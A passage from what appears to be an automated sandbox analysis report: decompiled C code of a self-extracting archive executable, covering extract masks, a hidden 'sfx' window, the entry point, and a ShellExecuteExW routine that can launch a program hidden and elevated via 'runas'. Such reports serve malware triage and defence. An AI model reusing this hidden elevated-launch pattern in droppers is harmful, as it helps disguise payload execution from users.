								_v16 = _v16 & 0x00000000;
								_t40 =  &_v12;
								 *_t40 = _v12 & 0x00000000;
								__eflags =  *_t40;
								do {
									_t178 =  &_v12;
									_t108 = E00404F59();
									__eflags = _t108;
									if(_t108 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									E00414803( &_v68, _t108);
									_t178 =  &_v56;
									_t118 = E00414C8A( &_v68,  &_v56);
									_push(_v68);
									__eflags = _t118;
									_v5 = _t118 != 0;
									L0041C160();
									__eflags = _v5;
									if(_v5 != 0) {
										_t178 = _v28;
										_t119 = E00402510(_t182, _v28);
										__eflags = _t119;
										if(_t119 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
										_v16 = 1;
									}
									__eflags = _v16;
								} while (_v16 == 0);
								_v12 = _v12 & 0x00000000;
								__eflags = _v16;
								if(_v16 != 0) {
									L37:
									_push(_v56);
									L0041C160();
									goto L38;
								} else {
									goto L27;
								}
								do {
									L27:
									_t178 =  &_v12;
									_t109 = E00404F59();
									__eflags = _t109;
									if(_t109 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									E00414803( &_v80, _t109);
									_t178 =  &_v56;
									_t114 = E00414C8A( &_v80,  &_v56);
									_push(_v80);
									__eflags = _t114;
									L0041C160();
									__eflags = _t132 & 0xffffff00 | _t114 != 0x00000000;
									if((_t132 & 0xffffff00 | _t114 != 0x00000000) != 0) {
										_t178 = _v20;
										_t115 = E00402510(_t182, _v20);
										__eflags = _t115;
										if(_t115 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
										_v16 = 1;
									}
									__eflags = _v16;
									_t132 = L"ExtractMaskExclude";
								} while (_v16 == 0);
								__eflags = _v16;
								if(_v16 == 0) {
									_t178 = _t132;
									_t110 = E0041422F(_t132);
									__eflags = _t110;
									if(_t110 == 0) {
										_t178 = L"ExtractMaskInclude";
										_t111 = E00402510(_t182, L"ExtractMaskInclude");
										__eflags = _t111;
										if(_t111 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
									}
								}
								goto L37;
								L38:
								E00414129( &_v96);
								_t182 = _t182 + 1;
								__eflags = _t182 - _v32;
							} while (_t182 < _v32);
							goto L39;
						}
					}
					_t93 = E0040468A( *__ecx, _t175); // executed
					__eflags = _t93;
					if(_t93 != 0) {
						goto L9;
					} else {
						_t100 = 0x80004005;
						goto L43;
					}
				}
				_t190 =  *0x422700; // 0x0
				if(_t190 != 0) {
					L4:
					_push(0x13);
					L5:
					_pop(_t128);
					_push(0);
					E00409684(_t175);
					_t100 = 0x80004005;
					goto L42;
				}
				_t191 =  *0x422704; // 0x0
				if(_t191 != 0) {
					goto L4;
				} else {
					_push(8);
					goto L5;
				}
			}














































                                          0x00402cb1
                                          0x00402cb7
                                          0x00402ccc
                                          0x00402ccf
                                          0x00402cd2
                                          0x00402cd9
                                          0x00402d04
                                          0x00402d0b
                                          0x00402d22
                                          0x00402d22
                                          0x00402d24
                                          0x00402d2a
                                          0x00402d2c
                                          0x00402d3a
                                          0x00402d2e
                                          0x00402d35
                                          0x00402d35
                                          0x00402d3d
                                          0x00402d44
                                          0x00402d49
                                          0x00402d50
                                          0x00402d55
                                          0x00402d5c
                                          0x00402d5f
                                          0x00402d62
                                          0x00402d64
                                          0x00402d67
                                          0x00402d67
                                          0x00402d6f
                                          0x00402d74
                                          0x00402d76
                                          0x00402d83
                                          0x00402d8e
                                          0x00402d9b
                                          0x00402da9
                                          0x00402dae
                                          0x00402db1
                                          0x00402db6
                                          0x00402db9
                                          0x00402dbf
                                          0x00402dc2
                                          0x00402dcb
                                          0x00402dcc
                                          0x00402dcf
                                          0x00402dcf
                                          0x00402dd8
                                          0x00402dd9
                                          0x00402dde
                                          0x00402de0
                                          0x00402de3
                                          0x00402de6
                                          0x00402de9
                                          0x00402f44
                                          0x00402f44
                                          0x00402f4a
                                          0x00402f4d
                                          0x00402f50
                                          0x00402f52
                                          0x00402f59
                                          0x00402f5e
                                          0x00402f5e
                                          0x00402f61
                                          0x00402f64
                                          0x00402f69
                                          0x00402f6c
                                          0x00402f6d
                                          0x00402f71
                                          0x00402def
                                          0x00402def
                                          0x00402df1
                                          0x00402df4
                                          0x00402dfa
                                          0x00402dfe
                                          0x00402e02
                                          0x00402e0b
                                          0x00402e0e
                                          0x00402e10
                                          0x00000000
                                          0x00000000
                                          0x00402e16
                                          0x00402e1b
                                          0x00000000
                                          0x00000000
                                          0x00402e27
                                          0x00402e2c
                                          0x00402e30
                                          0x00402e30
                                          0x00402e30
                                          0x00402e34
                                          0x00402e37
                                          0x00402e3a
                                          0x00402e3f
                                          0x00402e41
                                          0x00000000
                                          0x00000000
                                          0x00402e43
                                          0x00402e4a
                                          0x00402e4f
                                          0x00402e55
                                          0x00402e5a
                                          0x00402e5d
                                          0x00402e5f
                                          0x00402e63
                                          0x00402e68
                                          0x00402e6d
                                          0x00402e6f
                                          0x00402e74
                                          0x00402e79
                                          0x00402e7b
                                          0x00402e80
                                          0x00402e83
                                          0x00402e83
                                          0x00402e83
                                          0x00402e84
                                          0x00402e84
                                          0x00402e8b
                                          0x00402e8b
                                          0x00402e91
                                          0x00402e95
                                          0x00402e99
                                          0x00402f29
                                          0x00402f29
                                          0x00402f2c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402e9f
                                          0x00402e9f
                                          0x00402ea2
                                          0x00402ea5
                                          0x00402eaa
                                          0x00402eac
                                          0x00000000
                                          0x00000000
                                          0x00402eae
                                          0x00402eb5
                                          0x00402eba
                                          0x00402ec0
                                          0x00402ec5
                                          0x00402ec8
                                          0x00402ecd
                                          0x00402ed3
                                          0x00402ed5
                                          0x00402ed7
                                          0x00402edc
                                          0x00402ee1
                                          0x00402ee3
                                          0x00402ee8
                                          0x00402eeb
                                          0x00402eeb
                                          0x00402eeb
                                          0x00402eec
                                          0x00402eec
                                          0x00402ef3
                                          0x00402ef7
                                          0x00402ef7
                                          0x00402efe
                                          0x00402f02
                                          0x00402f07
                                          0x00402f09
                                          0x00402f0e
                                          0x00402f10
                                          0x00402f12
                                          0x00402f19
                                          0x00402f1e
                                          0x00402f20
                                          0x00402f25
                                          0x00402f28
                                          0x00402f28
                                          0x00402f28
                                          0x00402f20
                                          0x00402f10
                                          0x00000000
                                          0x00402f32
                                          0x00402f35
                                          0x00402f3a
                                          0x00402f3b
                                          0x00402f3b
                                          0x00000000
                                          0x00402def
                                          0x00402de9
                                          0x00402d0f
                                          0x00402d14
                                          0x00402d16
                                          0x00000000
                                          0x00402d18
                                          0x00402d18
                                          0x00000000
                                          0x00402d18
                                          0x00402d16
                                          0x00402cdb
                                          0x00402ce1
                                          0x00402cef
                                          0x00402cef
                                          0x00402cf1
                                          0x00402cf1
                                          0x00402cf3
                                          0x00402cf4
                                          0x00402cfa
                                          0x00000000
                                          0x00402cfa
                                          0x00402ce3
                                          0x00402ce9
                                          0x00000000
                                          0x00402ceb
                                          0x00402ceb
                                          0x00000000
                                          0x00402ceb

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID: ExtractMaskExclude$ExtractMaskInclude$PreExtract
                                          • API String ID: 4113381792-1386291556
                                          • Opcode ID: 0d0460d73eba80c1a101dab9caf3688d59568b34065a0a7196b0bfa7add7f1f1
                                          • Instruction ID: d17b0469287da104a56fb6e9b72567ba4b72c6d001a8acf4ea1ba453b7e2a31c
                                          • Opcode Fuzzy Hash: 0d0460d73eba80c1a101dab9caf3688d59568b34065a0a7196b0bfa7add7f1f1
                                          • Instruction Fuzzy Hash: D4815E70E0021AABDF14EBA5DA556EEB7B1AF84314F10403FE405B72D1DBB88D86DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403834, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69timewindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00403834(void* __edx) {
				struct tagRECT _v20;
				struct tagMSG _v48;
				struct HWND__* _t9;
				int _t21;
				int _t27;
				void* _t28;
				struct HWND__* _t29;

				_t28 = __edx;
				_t9 = CreateWindowExW(0x80, L"tooltips_class32", L"sfx", 0, 0, 0, 0, 0, 0, 0, GetModuleHandleW(0), 0); // executed
				_t29 = _t9;
				GetWindowRect(GetDesktopWindow(),  &_v20);
				asm("cdq");
				asm("cdq");
				_t21 = SetWindowPos(_t29, 0, _v20.right - _v20.left - _t28 >> 1, _v20.bottom - _v20.top - _t28 >> 1, 0, 0, 4);
				if(_t29 != 0) {
					SetTimer(_t29, 1, 1, 0); // executed
					GetMessageW( &_v48, 0, 0, 0);
					DispatchMessageW( &_v48);
					_t27 = KillTimer(_t29, 1);
					 *0x42272c = _t29;
					return _t27;
				}
				return _t21;
			}










                                          0x00403834
                                          0x0040385d
                                          0x00403863
                                          0x00403870
                                          0x0040387e
                                          0x0040388c
                                          0x00403894
                                          0x0040389c
                                          0x004038a4
                                          0x004038b1
                                          0x004038bb
                                          0x004038c4
                                          0x004038ca
                                          0x00000000
                                          0x004038ca
                                          0x004038d3

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406043,?,00000000), ref: 00403840
                                          • CreateWindowExW.USER32 ref: 0040385D
                                          • GetDesktopWindow.USER32 ref: 00403869
                                          • GetWindowRect.USER32 ref: 00403870
                                          • SetWindowPos.USER32(00000000,00000000,?,00406043,00000000,00000000,00000004), ref: 00403894
                                          • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 004038A4
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004038B1
                                          • DispatchMessageW.USER32 ref: 004038BB
                                          • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406043,?,00000000), ref: 004038C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$MessageTimer$CreateDesktopDispatchHandleKillModuleRect
                                          • String ID: sfx$tooltips_class32
                                          • API String ID: 3184818434-2224206080
                                          • Opcode ID: 3563f08bb3cb8092991ced233f77f7c04de6a27a174827c095c902f2545c8bd1
                                          • Instruction ID: 0e7f13be778ebd409a4db15796a4025058a8725858d3a305ba7ca36a6b4cbd87
                                          • Opcode Fuzzy Hash: 3563f08bb3cb8092991ced233f77f7c04de6a27a174827c095c902f2545c8bd1
                                          • Instruction Fuzzy Hash: 95115EB2A01224BBCB109BB99D4DEEF7F7DEF49751F008160F615E2094CAB49100CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C35F, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x41fa80);
				_push(0x41c4f0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x426c88 =  *0x426c88 | 0xffffffff;
				 *0x426c8c =  *0x426c8c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x424c74; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x424c70; // 0x0
				 *_t24 = _t47;
				 *0x426c84 = _adjust_fdiv;
				_t27 = E0041C4EB( *_adjust_fdiv);
				_t60 =  *0x4226f0; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E0041C4E8);
					_pop(_t47);
				}
				E0041C4D6(_t27);
				_push(0x422080);
				_push(0x42207c);
				L0041C4D0();
				_t29 =  *0x424c6c; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x424c68,  &_v112);
				_push(0x422078);
				_push(0x422000); // executed
				L0041C4D0(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while( *_t54 > 0x20) {
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t54);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00407014(_t47);
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041C4CA();
				return _t41;
			}





























                                          0x0041c362
                                          0x0041c364
                                          0x0041c369
                                          0x0041c374
                                          0x0041c375
                                          0x0041c382
                                          0x0041c387
                                          0x0041c38c
                                          0x0041c393
                                          0x0041c39a
                                          0x0041c3a1
                                          0x0041c3a7
                                          0x0041c3ad
                                          0x0041c3af
                                          0x0041c3b5
                                          0x0041c3bb
                                          0x0041c3c4
                                          0x0041c3c9
                                          0x0041c3ce
                                          0x0041c3d4
                                          0x0041c3db
                                          0x0041c3e1
                                          0x0041c3e1
                                          0x0041c3e2
                                          0x0041c3e7
                                          0x0041c3ec
                                          0x0041c3f1
                                          0x0041c3f6
                                          0x0041c3fb
                                          0x0041c414
                                          0x0041c41a
                                          0x0041c41f
                                          0x0041c424
                                          0x0041c431
                                          0x0041c433
                                          0x0041c439
                                          0x0041c475
                                          0x0041c47a
                                          0x0041c47b
                                          0x0041c47b
                                          0x0041c43b
                                          0x0041c43b
                                          0x0041c43b
                                          0x0041c43c
                                          0x0041c43f
                                          0x0041c441
                                          0x0041c44c
                                          0x0041c44e
                                          0x0041c44e
                                          0x0041c44f
                                          0x0041c44f
                                          0x0041c44c
                                          0x0041c452
                                          0x0041c456
                                          0x00000000
                                          0x00000000
                                          0x0041c45c
                                          0x0041c463
                                          0x0041c46d
                                          0x0041c482
                                          0x0041c46f
                                          0x0041c46f
                                          0x0041c46f
                                          0x0041c483
                                          0x0041c484
                                          0x0041c485
                                          0x0041c48d
                                          0x0041c48e
                                          0x0041c493
                                          0x0041c497
                                          0x0041c49d
                                          0x0041c4a2
                                          0x0041c4a4
                                          0x0041c4a7
                                          0x0041c4a8
                                          0x0041c4a9
                                          0x0041c4b0

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                          • String ID:
                                          • API String ID: 801014965-0
                                          • Opcode ID: 6ba2aeb5cbc5bc23aab9a516162c53aab4a9e006d365dc7ef0cafc49e58abbcf
                                          • Instruction ID: 67ce4814ce78279d72a23206d993da328827abf4023638930e906dbcac5dfea8
                                          • Opcode Fuzzy Hash: 6ba2aeb5cbc5bc23aab9a516162c53aab4a9e006d365dc7ef0cafc49e58abbcf
                                          • Instruction Fuzzy Hash: 0E418EB1D84354AFDB209FA5DC95AFA7BB8FB09714F20422BF491972A1C7784881CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401C59, Relevance: 15.1, APIs: 10, Instructions: 84synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E00401C59(intOrPtr __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				char _v32;
				struct _SHELLEXECUTEINFOW _v92;
				void* _t36;
				struct HWND__* _t42;
				int _t50;
				int _t51;
				signed int _t55;
				signed int _t56;
				int _t66;

				_v8 = __ecx;
				_t55 = __edx;
				E004147DF(E004147DF(_t36,  &_v20),  &_v32);
				_t66 = 0;
				memset( &_v92, 0, 0x3c);
				_v92.cbSize = 0x3c;
				_v92.lpDirectory = _a4;
				_v92.fMask = 0x740;
				_v92.nShow = 0xa;
				if((_t55 & 0x00000001) != 0) {
					_v92.nShow = 0;
					_v92.fMask = 0x8740;
				}
				if((_t55 & 0x00000002) != 0) {
					_v92.lpVerb = L"runas";
				}
				_t56 = _t55 & 0x00010000;
				if(_t56 == 0) {
					_v92.fMask = _v92.fMask | 0x00000100;
				}
				_t42 =  *0x42272c; // 0x2d0260
				_v92.hwnd = _t42;
				ShowWindow(_t42, 5); // executed
				BringWindowToTop(_v92.hwnd);
				E00414864( &_v32, E00403022(_v8,  &_v20));
				if(_v16 != _t66) {
					_v92.lpFile = _v20;
					_v92.lpParameters = _v32;
					_t50 = ShellExecuteExW( &_v92); // executed
					if(_t50 != 0) {
						if(_t56 == _t66) {
							WaitForSingleObject(_v92.hProcess, 0xffffffff);
						}
						CloseHandle(_v92.hProcess);
						_t66 = 1;
					}
					_push(_v32);
					L0041C160();
					_push(_v20);
					L0041C160();
					_t51 = _t66;
				} else {
					_push(_v32);
					L0041C160();
					_push(_v20);
					L0041C160();
					_t51 = 1;
				}
				return _t51;
			}















                                          0x00401c60
                                          0x00401c67
                                          0x00401c71
                                          0x00401c78
                                          0x00401c7f
                                          0x00401c8a
                                          0x00401c91
                                          0x00401c94
                                          0x00401c9b
                                          0x00401ca5
                                          0x00401ca7
                                          0x00401caa
                                          0x00401caa
                                          0x00401cb4
                                          0x00401cb6
                                          0x00401cb6
                                          0x00401cbd
                                          0x00401cc3
                                          0x00401cc5
                                          0x00401cc5
                                          0x00401ccc
                                          0x00401cd4
                                          0x00401cd7
                                          0x00401ce0
                                          0x00401cf5
                                          0x00401cfd
                                          0x00401d17
                                          0x00401d1d
                                          0x00401d24
                                          0x00401d2c
                                          0x00401d30
                                          0x00401d37
                                          0x00401d37
                                          0x00401d40
                                          0x00401d48
                                          0x00401d48
                                          0x00401d49
                                          0x00401d4c
                                          0x00401d51
                                          0x00401d54
                                          0x00401d59
                                          0x00401cff
                                          0x00401cff
                                          0x00401d02
                                          0x00401d07
                                          0x00401d0a
                                          0x00401d11
                                          0x00401d11
                                          0x00401d60

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • memset.MSVCRT ref: 00401C7F
                                          • ShowWindow.USER32(002D0260,00000005,?,0041D9F0,00000000), ref: 00401CD7
                                          • BringWindowToTop.USER32 ref: 00401CE0
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401D02
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401D0A
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00401D24
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041D9F0,00000000), ref: 00401D37
                                          • CloseHandle.KERNEL32(?,?,0041D9F0,00000000), ref: 00401D40
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401D4C
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401D54
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$Window$??2@BringCloseExecuteHandleObjectShellShowSingleWaitmemset
                                          • String ID:
                                          • API String ID: 1117119541-0
                                          • Opcode ID: dff4abdc5303b9fd1c782baafb5de2873828b693f90045e820f85eb0d88bb0bc
                                          • Instruction ID: 6f8207a67a2572a909a3f2a1a43fdbbd5cf9fef0efaf3e720be5f44350d0943e
                                          • Opcode Fuzzy Hash: dff4abdc5303b9fd1c782baafb5de2873828b693f90045e820f85eb0d88bb0bc
                                          • Instruction Fuzzy Hash: 96318BB1D40208ABDF11EFE5DC89ADEBBB5FF84304F10802AE121B62A5DB785945CF08
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00417D32, Relevance: 11.0, APIs: 7, Instructions: 497COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00417D32() {
				void* __esi;
				signed int _t244;
				signed int _t248;
				signed int _t253;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t289;
				intOrPtr _t296;
				signed int _t298;
				signed int _t299;
				signed int _t304;
				signed int _t306;
				signed int _t307;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t331;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t376;
				intOrPtr _t398;
				signed int _t404;
				signed int _t416;
				signed int _t423;
				intOrPtr _t425;
				signed int _t426;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t436;
				void* _t437;
				signed int _t439;
				signed int _t443;
				intOrPtr* _t445;
				void* _t447;

				L0041C1F0();
				 *((intOrPtr*)(_t445 - 0x10)) = _t447 - 0xfffffffffffffff0;
				 *(_t445 - 4) = 0;
				_t428 =  *(_t445 + 0x7c);
				_t341 = _t428;
				 *(_t445 + 0x60) = _t341;
				if(_t428 != 0) {
					 *((intOrPtr*)( *_t428 + 4))(_t428);
				}
				 *((intOrPtr*)(_t445 + 0x24)) = 0;
				 *((intOrPtr*)(_t445 + 0x28)) = 0;
				 *(_t445 + 0x7f) =  *((intOrPtr*)(_t445 + 0x74)) == 0xffffffff;
				_t443 =  *(_t445 + 0x6c);
				if( *(_t445 + 0x7f) != 0) {
					 *((intOrPtr*)(_t445 + 0x74)) =  *((intOrPtr*)(_t443 + 0x6c));
				}
				if( *((intOrPtr*)(_t445 + 0x74)) != 0) {
					 *(_t445 + 0x1c) =  *(_t445 + 0x1c) | 0xffffffff;
					 *(_t445 + 0x18) = 0;
					_t429 = 0;
					__eflags = 0;
					while(1) {
						 *(_t445 + 0xc) = _t429;
						__eflags = _t429 -  *((intOrPtr*)(_t445 + 0x74));
						if(_t429 >=  *((intOrPtr*)(_t445 + 0x74))) {
							break;
						}
						__eflags =  *(_t445 + 0x7f);
						if( *(_t445 + 0x7f) == 0) {
							_t426 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t429 * 4);
						} else {
							_t426 = _t429;
						}
						_t331 =  *( *((intOrPtr*)(_t443 + 0x12c)) + _t426 * 4);
						 *(_t445 + 0x6c) = _t331;
						__eflags = _t331 - 0xffffffff;
						if(_t331 == 0xffffffff) {
							L21:
							_t429 = _t429 + 1;
							continue;
						} else {
							__eflags = _t331 -  *(_t445 + 0x1c);
							if(_t331 !=  *(_t445 + 0x1c)) {
								L16:
								_t416 =  *( *((intOrPtr*)(_t443 + 0x128)) + _t331 * 4);
								 *(_t445 + 0x18) = _t416;
								L17:
								 *(_t445 + 0x38) = _t416;
								while(1) {
									__eflags =  *(_t445 + 0x38) - _t426;
									if( *(_t445 + 0x38) > _t426) {
										break;
									}
									 *((intOrPtr*)(_t445 + 0x24)) =  *((intOrPtr*)(_t445 + 0x24)) +  *((intOrPtr*)( *(_t445 + 0x38) * 0x18 +  *((intOrPtr*)(_t443 + 0x68))));
									asm("adc [ebp+0x28], eax");
									 *(_t445 + 0x38) =  *(_t445 + 0x38) + 1;
									_t341 =  *(_t445 + 0x60);
									_t331 =  *(_t445 + 0x6c);
								}
								_t416 = _t426 + 1;
								 *(_t445 + 0x18) = _t416;
								 *(_t445 + 0x1c) = _t331;
								_t429 =  *(_t445 + 0xc);
								goto L21;
							}
							__eflags = _t426 - _t416;
							if(_t426 >= _t416) {
								goto L17;
							}
							goto L16;
						}
					}
					_t244 =  *((intOrPtr*)( *_t341 + 0xc))(_t341,  *((intOrPtr*)(_t445 + 0x24)),  *((intOrPtr*)(_t445 + 0x28)));
					__eflags = _t244;
					if(_t244 == 0) {
						_push(0x38);
						L0041C16C();
						__eflags = _t244;
						if(_t244 == 0) {
							_t342 = 0;
							__eflags = 0;
						} else {
							_t342 = E004161A3(_t244);
						}
						 *(_t445 + 0x2c) = _t342;
						 *(_t445 + 0x54) = _t342;
						__eflags = _t342;
						if(_t342 != 0) {
							 *((intOrPtr*)( *_t342 + 4))(_t342);
						}
						_t431 =  *(_t445 + 0x60);
						E004160C9(_t342, _t431);
						E00416FE1(_t445 - 0x7c, __eflags, 1);
						 *(_t445 + 0x5c) =  *(_t445 + 0x5c) & 0x00000000;
						_t248 =  *((intOrPtr*)( *_t431))(_t431, 0x41d500, _t445 + 0x5c, 0);
						_push(0x38);
						L0041C16C();
						__eflags = _t248;
						if(_t248 == 0) {
							_t248 = 0;
							__eflags = 0;
						} else {
							 *_t248 = 0x41f7c4;
							 *((intOrPtr*)(_t248 + 4)) = 0;
							 *_t248 = 0x41f964;
							 *((intOrPtr*)(_t248 + 8)) = 0;
							 *((short*)(_t248 + 0xc)) = 0x100;
							 *((intOrPtr*)(_t248 + 0x30)) = 0;
						}
						_t432 = _t248;
						 *(_t445 + 0x3c) = _t432;
						 *(_t445 + 0x50) = _t432;
						__eflags = _t432;
						if(_t432 != 0) {
							 *((intOrPtr*)( *_t432 + 4))(_t432);
						}
						 *((intOrPtr*)(_t432 + 0x2c)) = _t443 + 0x10;
						_t73 = _t432 + 0x30; // 0x30
						E004160A2(_t73,  *(_t445 + 0x60));
						__eflags =  *(_t445 + 0x78);
						 *((char*)(_t432 + 0xc)) = 0 |  *(_t445 + 0x78) != 0x00000000;
						__eflags =  *(_t443 + 0x158);
						_t80 =  *(_t443 + 0x158) != 0;
						__eflags = _t80;
						 *((char*)(_t432 + 0xd)) = 0 | _t80;
						 *(_t445 + 0x44) = 0;
						while(1) {
							_t433 =  *(_t445 + 0x50);
							_t343 = E00416097(_t342);
							__eflags = _t343;
							if(_t343 != 0) {
								break;
							}
							_t253 =  *(_t445 + 0x44);
							__eflags = _t253 -  *((intOrPtr*)(_t445 + 0x74));
							if(_t253 <  *((intOrPtr*)(_t445 + 0x74))) {
								 *((intOrPtr*)(_t445 + 0x30)) = 0;
								 *((intOrPtr*)(_t445 + 0x34)) = 0;
								 *((intOrPtr*)(_t445 + 0x10)) = 0;
								 *((intOrPtr*)(_t445 + 0x14)) = 0;
								__eflags =  *(_t445 + 0x7f);
								if( *(_t445 + 0x7f) == 0) {
									_t434 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t253 * 4);
								} else {
									_t434 = _t253;
								}
								_t344 =  *( *((intOrPtr*)(_t443 + 0x12c)) + _t434 * 4);
								 *(_t445 - 0x14) = _t344;
								 *(_t445 + 0x40) = 1;
								__eflags = _t344 - 0xffffffff;
								if(_t344 == 0xffffffff) {
									L70:
									asm("sbb ecx, ecx");
									_t257 = E00417D0D( *(_t445 + 0x3c), _t434,  !( ~( *(_t445 + 0x7f) & 0x000000ff)) &  *((intOrPtr*)(_t445 + 0x70)) +  *(_t445 + 0x44) * 0x00000004,  *(_t445 + 0x40));
									 *(_t445 + 0x44) =  *(_t445 + 0x44) +  *(_t445 + 0x40);
									__eflags = _t257;
									if(_t257 == 0) {
										_t259 =  *(_t445 + 0x3c);
										__eflags =  *(_t259 + 0x24);
										if( *(_t259 + 0x24) == 0) {
											L109:
											_t260 =  *(_t445 + 0x2c);
